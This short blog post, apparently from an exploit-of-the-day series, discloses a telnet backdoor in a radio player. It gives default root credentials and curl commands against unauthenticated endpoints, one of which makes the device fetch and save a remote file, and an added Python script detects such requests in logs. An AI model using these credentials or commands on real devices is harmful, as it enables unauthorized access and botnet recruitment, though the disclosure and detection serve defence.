An undocumented telnet backdoor was found in a popular radio player
Proof of concept
The default usernames and passwords were:
* root / password
* usb / winbond
The system runs an embedded Linux kernel, which is very common among IoT devices.
OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease) GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 4.2.1 GCC: (GNU) 3.3.2 20031005 (Debian prerelease) Aaeabi .shstrtab .init .text .fini .rodata .ARM.extab .ARM.exidx .eh_frame .init_array .fini_array .jcr .data.rel.ro .got .data .bss .comment .ARM.attributes
Several actions can be performed without authentication:
Change the logo:
curl -XGET 'http://iphere/mylogo?url=http://example.com/own.jpg'
Download a file:
curl -XGET 'http://iphere/LocalPlay?url=http://example.com/msg.wav&save=1'
This vulnerability and backdoor are most likely to be used in larger automated
attacks, such as those carried out by the Mirai botnet.
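
To spot requests to these endpoints on your own network, here is an added detection example (not part of the original post and not the vendor's code) that scans HTTP request logs for the two unauthenticated paths above. The log line format, the sample lines, the field names and the case-insensitive matching are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Unauthenticated endpoints named in the post, with a label for each.
WATCHED_PATHS = {"/mylogo": "logo change", "/LocalPlay": "remote file fetch"}

# Constructed sample lines in an assumed format:
#   <time> <src_ip> <device_ip> <method> <request-target>
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 192.0.2.10 192.0.2.50 GET /mylogo?url=http://example.com/own.jpg
2024-01-01T10:00:05Z 192.0.2.10 192.0.2.50 GET /LocalPlay?url=http://example.com/msg.wav&save=1
2024-01-01T10:00:09Z 192.0.2.11 192.0.2.50 GET /index.html
2024-01-01T10:00:12Z 192.0.2.12 192.0.2.50 GET /localplay?URL=http://example.com/a.wav
malformed line
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) ([A-Z]+) (\S+)$")


def find_suspicious_requests(log_text):
    """Return one finding per request that hits a watched endpoint with a url parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        when, src, device, _method, target = m.groups()
        parts = urlsplit(target)
        # Assumption: match case-insensitively in case the device's web server is lenient.
        action = next((label for path, label in WATCHED_PATHS.items()
                       if path.lower() == parts.path.lower()), None)
        if action is None:
            continue
        query = {k.lower(): v for k, v in parse_qs(parts.query).items()}
        if "url" not in query:
            continue  # the endpoints in the post are driven by the url parameter
        findings.append({
            "time": when, "src": src, "device": device, "action": action,
            "fetched_url": query["url"][0],
            "saved_to_device": query.get("save", ["0"])[0] == "1",
        })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_requests(SAMPLE_LOG):
        print(finding)
```

Findings with `saved_to_device` set are the ones to review first, since they indicate a file was written to the radio rather than only played or displayed.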
This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.